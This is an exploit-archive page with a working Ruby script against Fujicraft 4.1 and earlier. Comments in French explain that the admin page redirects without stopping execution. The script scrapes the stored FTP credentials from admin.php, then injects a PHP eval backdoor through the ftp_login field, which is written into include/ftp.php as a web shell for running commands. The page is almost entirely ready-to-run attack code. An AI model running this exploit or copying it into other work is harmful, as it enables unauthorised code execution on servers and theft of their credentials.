Fujicraft <= 4.1 Remote Php Execution

Download | Vote Up (4) | Vote Down (0) 
#!/usr/bin/ruby

require 'net/http'

# Descriptif :
# La zone admin effectue un header() sans exit,
# Le php en dessous de l'header est donc bien executé
# On accède donc a toute les fonctions de la zone admin
# La plus intéressante ; changement des infos du ftp
# Qui permet d'écrire dans un fichier sans condition
# Dont du php.
#


site = "localhost"
path = "/pentest/fujicraft/fujicraft/"
payload = "echo eval($_GET['c']);" #Php payload

puts "        #######################"
puts "        #       HWC Crew      #"
puts "        #######################"
puts "            - hwc-crew.com\n\n"


http = Net::HTTP.new(site, 80)


puts "[+] - Getting infos... "
resp, page1 = http.get(path+"admin.php?page=ftp")

username = page1.scan(/id="ftpLogin" value="(.+?)" \/>/)
password = page1.scan(/id="ftpPassword" value="(.+?)" \/>/)
hote     = page1.scan(/ id="ftpHost" value="(.+?)" \/>/)
ftp_path = page1.scan(/id="ftpPath" value="(.+?)" \/>/)
port     = page1.scan(/value="([0-9]+)" checked="true" \/>/)

data = "server_path=2&ftp_login=#{username}'); #{payload}//&ftp_password=#{password}&ftp_host=#{hote}&ftp_path=#{ftp_path}&ftp_port=#{port}&submit=Submit+Query"

puts "[+] - Injecting payload... "
resp, page2 = http.post(path+"admin.php?page=ftp", data, "")

if page2.match(/FTP ont bien/)

        puts "[+] - Payload successfuly injected ! \n"
        puts "[+] - View result on : #{site}#{path}include/ftp.php"
else
        
        puts "[-] - Error during injection. Verify the given informations."

end

Groucho

Be the first to give feedback !
Please login to comment !